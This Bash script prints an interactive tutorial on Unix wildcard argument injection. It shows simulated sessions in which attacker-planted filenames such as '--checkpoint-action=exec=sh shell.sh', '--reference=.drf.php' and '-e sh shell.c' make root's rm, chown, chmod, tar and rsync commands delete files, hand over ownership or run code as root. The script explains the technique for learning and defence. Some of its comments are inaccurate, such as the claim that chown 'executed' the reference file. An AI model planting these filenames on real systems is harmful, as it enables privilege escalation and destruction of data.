#!/bin/bash

  : '   # File  :         wildcard.sh
        # Name  :         Greg Shrewsbury
        # Date  :         18_MAY_2020
        # Desc  :         Provide description of malicious use of wildcards in liunx
        # Usage :         ./script.sh OR source script.sh
        # Reference:      https://defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
                          https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/'

# --- COLOR VARIABLES AND FUNCTIONS --- #
   export NC='\e[0m'               # Text Reset
   export BBlack='\e[1;30m'        # Black
   export BRed='\e[1;31m'          # Red
   export BGreen='\e[1;32m'        # Green
   export BYellow='\e[1;33m'       # Yellow
   export BBlue='\e[1;34m'         # Blue
   export BPurple='\e[1;35m'       # Purple
   export BCyan='\e[1;36m'         # Cyan
   export BWhite='\e[1;37m'        # White
   export NC='\e[0m'               # Text Reset
   export Black='\e[0;30m'         # Black
   export Red='\e[0;31m'           # Red
   export Green='\e[0;32m'         # Green
   export Yellow='\e[0;33m'        # Yellow
   export Blue='\e[0;34m'          # Blue
   export Purple='\e[0;35m'        # Purple
   export Cyan='\e[0;36m'          # Cyan
   export White='\e[0;37m'         # White

  function comm { echo -e "${BGreen}${1}${NC}"
  }
  function cli { echo -e "${Red}# ${1}${NC}"
  }
  function label { echo -e "${BBlue}${1}${NC}"
  }
  function output { echo -e "${NC}${1}\n"
  }

# --- Functions --- #
   reset

# ----- About Asterick ----- #

 about_* () {
      reset
      label '# --- About * --- #\n'
      comm '# An asterisk matches any number of characters in a filename, including "none"'
      comm '# However, using the asterisk in a shell will interpret files beginning with hyphen (-) character as command line arguments to executed command/program.'
      cli 'ls -l'

      output \
"drwxrwxr-x.  5 root   root   4096 May 28 17:04 .
drwx------. 22 root   root   4096 May 28 16:15 ..
drwxrwxr-x.  2 root   root   4096 May 28 17:04 DIR1
drwxrwxr-x.  2 root   root   4096 May 28 17:04 DIR2
drwxrwxr-x.  2 root   root   4096 May 28 17:04 DIR3
-rw-rw-r--.  1 root   root      0 May 28 17:03 file1.txt
-rw-rw-r--.  1 root   root      0 May 28 17:03 file2.txt
-rw-rw-r--.  1 root   root      0 May 28 17:03 file3.txt
-rw-rw-r--.  1 nobody nobody    0 May 28 16:38 ${Cyan}-rf${NC}"

     cli 'rm *'
     cli 'ls -al'

      output \
'drwxrwxr-x.  5 root   root   4096 May 28 17:04 .
drwx------. 22 root   root   4096 May 28 16:15 ..
-rw-rw-r--.  1 nobody nobody    0 May 28 16:38 -rf'

    comm '# Obviously -rf was read as an argument to the "rm *"" command.'
    comm '# This can be varified with the strace command.'

    cli 'strace rm *'

    output \
"execve("/bin/rm", [\"rm\", \"DIR1\", \"DIR2\", \"DIR3\", \"file1.txt\", \"file2.txt\", \"file3.txt\", ${Cyan}\"-rf\"${NC}], [/* 25 vars */]) = 0"

}

# -----About chown ----- #
 about_chown () {
   reset
   label '# --- About chown --- #\n'
   comm '# Now chown can be used to hijack a files permissions.'
   comm '# root could mistakenly change the permissions to the attackers permissions and the attacker would effectivly own those files.'

   cli 'ls -al'

   output \
"drwxrwxrwx.  2 user user 4096 May 28 17:47 .
drwx------. 22 user user 4096 May 28 17:34 ..
-rw-rw-r--.  1 user user   66 May 28 17:36 admin.php
-rw-rw-r--.  1 user user   34 May 28 17:35 ado.php
-rw-rw-r--.  1 user user   80 May 28 17:44 config.php
-rw-rw-r--.  1 user user  187 May 28 17:44 db.php
-rw-rw-r--.  1 user user  201 May 28 17:35 download.php
-rw-r--r--.  1 mint mint    0 May 28 17:40 ${Purple}.drf.php${NC}
-rw-rw-r--.  1 user user   43 May 28 17:35 file1.php
-rw-rw-r--.  1 user user   56 May 28 17:47 footer.php
-rw-rw-r--.  1 user user  357 May 28 17:36 global.php
-rw-rw-r--.  1 user user  225 May 28 17:35 header.php
-rw-rw-r--.  1 user user  117 May 28 17:35 inc.php
-rw-rw-r--.  1 user user  111 May 28 17:38 index.php
-rw-rw-r--.  1 mint mint    0 May 28 17:45 ${Cyan}--reference${NC}=${Purple}.drf.php${NC}
-rw-rw----.  1 user user   66 May 28 17:35 password.inc.php
-rw-rw-r--.  1 user user   94 May 28 17:35 script.php"

    comm '# If root wanted to change ownership of all files it would look like this'
    cli 'chown -R nobody:nobody *.php'
    comm '# Where "nobody" is the user who root wants to change permissions to'
    cli 'ls -al'

   output \
"drwxrwxrwx.  2 user user 4096 May 28 17:47 .
drwx------. 22 user user 4096 May 28 17:34 ..
-rw-rw-r--.  1 mint mint   66 May 28 17:36 admin.php
-rw-rw-r--.  1 mint mint   34 May 28 17:35 ado.php
-rw-rw-r--.  1 mint mint   80 May 28 17:44 config.php
-rw-rw-r--.  1 mint mint  187 May 28 17:44 db.php
-rw-rw-r--.  1 mint mint  201 May 28 17:35 download.php
-rw-r--r--.  1 mint mint    0 May 28 17:40 ${Purple}.drf.php${NC}
-rw-rw-r--.  1 mint mint   43 May 28 17:35 file1.php
-rw-rw-r--.  1 mint mint   56 May 28 17:47 footer.php
-rw-rw-r--.  1 mint mint  357 May 28 17:36 global.php
-rw-rw-r--.  1 mint mint  225 May 28 17:35 header.php
-rw-rw-r--.  1 mint mint  117 May 28 17:35 inc.php
-rw-rw-r--.  1 mint mint  111 May 28 17:38 index.php
-rw-rw-r--.  1 mint mint    0 May 28 17:45 ${Cyan}--reference${NC}=${Purple}.drf.php${NC}
-rw-rw----.  1 mint mint   66 May 28 17:35 password.inc.php
-rw-rw-r--.  1 mint mint   94 May 28 17:35 script.php"

    comm \
'# All your files belong to mint now.
# Running "curl cht.sh/chown" will show that --reference will change the owner of a file/directory to match the referenced file.
# When --reference was read it was taken as argument for chown and executed .drf.php file which was owned by the attacker.
# Imagine if mint set a sym link to /etc/shadow, ownership of /etc/shadow would also be changed to the user "mint".'

}

# -----About chmod ----- #
about_chmod () {
  reset
  label '# --- About chmod --- #\n'
  comm '# Similar to chown, chmod can be used can be abused to specify arbitrary permissions on files selected with asterisk wildcard.'
  cli 'man chmod'

    output \
"--reference=RFILE use RFILE's mode instead of MODE values"

  comm '# Just like chown, the --reference=RFILE will be read and executed, this time to modify the permissions'

  cli 'ls -al'

    output \
'drwxrwxrwx.  2 user user  4096 May 29 00:41 .
drwx------. 24 user user  4096 May 28 18:32 ..
-rw-rw-r--.  1 user user 20480 May 28 19:13 admin.php
-rw-rw-r--.  1 user user    34 May 28 17:47 ado.php
-rw-rw-r--.  1 user user   187 May 28 17:44 db.php
-rw-rw-r--.  1 user user   201 May 28 17:43 download.php
-rwxrwxrwx.  1 mint mint     0 May 29 00:40 ${Purple}.drf.php${NC}
-rw-rw-r--.  1 user user    43 May 28 17:35 file1.php
-rw-rw-r--.  1 user user    56 May 28 17:47 footer.php
-rw-rw-r--.  1 user user   357 May 28 17:36 global.php
-rw-rw-r--.  1 user user   225 May 28 17:37 header.php
-rw-rw-r--.  1 user user   117 May 28 17:36 inc.php
-rw-rw-r--.  1 user user   111 May 28 17:38 index.php
-rw-r--r--.  1 mint mint     0 May 29 00:41 ${Cyan}--reference${NC}=${Purple}.drf.php${NC}
-rw-rw-r--.  1 user user    94 May 28 17:38 script.php'

  cli 'chmod 000 *'

      output \
"drwxrwxrwx.  2 user user  4096 May 29 00:41 .
drwx------. 24 user user  4096 May 28 18:32 ..
-rwxrwxrwx.  1 user user 20480 May 28 19:13 admin.php
-rwxrwxrwx.  1 user user    34 May 28 17:47 ado.php
-rwxrwxrwx.  1 user user   187 May 28 17:44 db.php
-rwxrwxrwx.  1 user user   201 May 28 17:43 download.php
-rwxrwxrwx.  1 mint mint     0 May 29 00:40 ${Purple}.drf.php${NC}
-rwxrwxrwx.  1 user user    43 May 28 17:35 file1.php
-rwxrwxrwx.  1 user user    56 May 28 17:47 footer.php
-rwxrwxrwx.  1 user user   357 May 28 17:36 global.php
-rwxrwxrwx.  1 user user   225 May 28 17:37 header.php
-rwxrwxrwx.  1 user user   117 May 28 17:36 inc.php
-rwxrwxrwx.  1 user user   111 May 28 17:38 index.php
-rw-r--r--.  1 mint mint     0 May 29 00:41 ${Cyan}--reference${NC}=${Purple}.drf.php${NC}
-rwxrwxrwx.  1 user user    94 May 28 17:38 script.php"

    comm \
"# Instead of removing all permissions, all permissions were applied after the --reference file was supplied
# *Additionally the attacker could use '-R' filename, to change file permissions on files in all subdirectories recursively."

}

# -----About *.tar ----- #
 about_.tar () {
   reset
   label '# --- About .tar --- #\n'

   cli 'ls -al'

    output \
"drwxrwxrwx.  2 user user  4096 May 28 19:34 .
drwx------. 24 user user  4096 May 28 18:32 ..
-rw-rw-r--.  1 user user 20480 May 28 19:13 admin.php
-rw-rw-r--.  1 user user    34 May 28 17:47 ado.php
-rw-r--r--.  1 mint mint     0 May 28 19:19 ${Cyan}--checkpoint=1${NC}
-rw-r--r--.  1 mint mint     0 May 28 19:17 ${Cyan}--checkpoint-action=exec=sh ${Purple}shell.sh${NC}
-rw-rw-r--.  1 user user   187 May 28 17:44 db.php
-rw-rw-r--.  1 user user   201 May 28 17:43 download.php
-rw-rw-r--.  1 user user    43 May 28 17:35 file1.php
-rw-rw-r--.  1 user user    56 May 28 17:47 footer.php
-rw-rw-r--.  1 user user   357 May 28 17:36 global.php
-rw-rw-r--.  1 user user   225 May 28 17:37 header.php
-rw-rw-r--.  1 user user   117 May 28 17:36 inc.php
-rw-rw-r--.  1 user user   111 May 28 17:38 index.php
-rw-rw-r--.  1 user user    94 May 28 17:38 script.php
-rwxr-xr-x.  1 mint mint    12 May 28 19:17 ${Purple}shell.sh${NC}"

  comm '# root wants to create a tar file of all files in this directory.'
  cli 'tar cf archive.tar *'
    output \
'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023'

  comm '# Again, user mint has inserted custom files and has executed shell.sh file which launched command for /usr/bin/id and executed it under root privilege.'
  cli 'man tar'

    output \
'--checkpoint[=N]
        Display progress messages every Nth record (default 10).
  and

--checkpoint-action=ACTION
       Run ACTION on each checkpoint.'

}

# -----About rsync ----- #
 about_rsync () {
   reset
   label '# --- About_rsync --- #\n'

   comm '# curl cht.sh/rsync'

   output 'Transfer files either to or from a remote host (not between two remote hosts). Similar to scp'
   comm '# man sync'

   output \
'-e, --rsh=COMMAND           specify the remote shell to use
    --rsync-path=PROGRAM    specify the rsync to run on remote machine'

    cli 'ls -al'

    output \
'drwxrwxrwx.  2 user user  4096 May 28 04:47 .
drwx------. 24 user user  4096 May 28 18:32 ..
-rwxr-xr-x.  1 user user 20480 May 28 19:13 admin.php
-rwxr-xr-x.  1 user user    34 May 28 17:47 ado.php
-rwxr-xr-x.  1 user user   187 May 28 17:44 db.php
-rwxr-xr-x.  1 user user   201 May 28 17:43 download.php
-rw-r--r--.  1 mint mint     0 May 28 04:45 -e sh shell.c
-rwxr-xr-x.  1 user user    43 May 28 17:35 file1.php
-rwxr-xr-x.  1 user user    56 May 28 17:47 footer.php
-rwxr-xr-x.  1 user user   357 May 28 17:36 global.php
-rwxr-xr-x.  1 user user   225 May 28 17:37 header.php
-rwxr-xr-x.  1 user user   117 May 28 17:36 inc.php
-rwxr-xr-x.  1 user user   111 May 28 17:38 index.php
-rwxr-xr-x.  1 user user    94 May 28 17:38 script.php
-rwxr-xr-x.  1 mint mint    31 May 28 04:45 shell.c'

  comm '# Using standard rsync syntax for copying files [rsync [optional modifiers] [SRC] [DEST]] root would like to copy all ".c" files to the remote server.'

  cli 'rsync -t *.c foo:src/'

  output \
'rsync: connection unexpectedly closed (0 bytes received so far) [sender]
rsync error: error in rsync protocol data stream (code 12) at io.c(601) [sender=3.0.8]'

  cli 'ls -la'

  output \
'drwxrwxrwx.  2 user user  4096 May 28 04:49 .
drwx------. 24 user user  4096 May 28 18:32 ..
-rwxr-xr-x.  1 user user 20480 May 28 19:13 admin.php
-rwxr-xr-x.  1 user user    34 May 28 17:47 ado.php
-rwxr-xr-x.  1 user user   187 May 28 17:44 db.php
-rwxr-xr-x.  1 user user   201 May 28 17:43 download.php
-rw-r--r--.  1 mint mint     0 May 28 04:45 -e sh shell.c
-rwxr-xr-x.  1 user user    43 May 28 17:35 file1.php
-rwxr-xr-x.  1 user user    56 May 28 17:47 footer.php
-rwxr-xr-x.  1 user user   357 May 28 17:36 global.php
-rwxr-xr-x.  1 user user   225 May 28 17:37 header.php
-rwxr-xr-x.  1 user user   117 May 28 17:36 inc.php
-rwxr-xr-x.  1 user user   111 May 28 17:38 index.php
-rwxr-xr-x.  1 user user    94 May 28 17:38 script.php
-rwxr-xr-x.  1 mint mint    31 May 28 04:45 shell.c
-rw-r--r--.  1 root root   101 May 28 04:49 shell_output.txt'

  comm '# After rsync was run and errored, it created a new file "shell_output.txt".'
  comm '# Checking the contents of "shell_output.txt" shows:'

  cli 'cat shell_output.txt'

  output \
'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023'

  comm '# After the command was executed, the "-e sh shell.c" file was executed making the "shell_output.txt" file.'

  cli cat shell.c

  output \
'/usr/bin/id > shell_output.txt'

}

# --- Main --- #

 mainMenu () {
 reset
 while :
 do

        echo -e "   .------..------..------..------.     .------..------..------..------..------."
        echo -e "   |W.--. ||I.--. ||L.--. ||D.--. |.-.  |C.--. ||A.--. ||R.--. ||D.--. ||S.--. |"
        echo -e "   | :/\: || (\/) || :/\: || :/\: ((G)) | :/\: || (\/) || :(): || :/\: || :/\: |"
        echo -e "   | :\/: || :\/: || (__) || (__) |'-.-.| :\/: || :\/: || ()() || (__) || :\/: |"
        echo -e "   | '--'W|| '--'I|| '--'L|| '--'D| ((S)) '--'C|| '--'A|| '--'R|| '--'D|| '--'S|"
        echo -e "   .------'.------'.------'.------'  '-'.------'.------'.------'.------'.------'"

        echo
        echo -e "${BCyan}Choose from the following options:"
        echo -e "${BGreen}# ---------------------------------- #${NC}"
        echo "   [1] *"
        echo "   [2] chown"
        echo "   [3] chmod"
        echo "   [4] *.tar"
        #echo "   [5] rsync"
        echo
        echo -e "${BPurple}   [X] to Exit : [C] to Clear the Screen${NC}" && echo
        read -p 'Choice:  ' choice
        echo
        case $choice in
            1) about_*
                      ;;
            2) about_chown
                      ;;
            3) about_chmod
                      ;;
            4) about_.tar
                      ;;
            #5) about_rsync
            #          ;;
            [xX]) return 0
                      ;;
            [cC])  reset
                      ;;
            *) echo "Please enter a valid option"
                      ;;
         esac
         echo -e '\n\n\n'
  done
  }
# RUN THE PROGRAM
  mainMenu
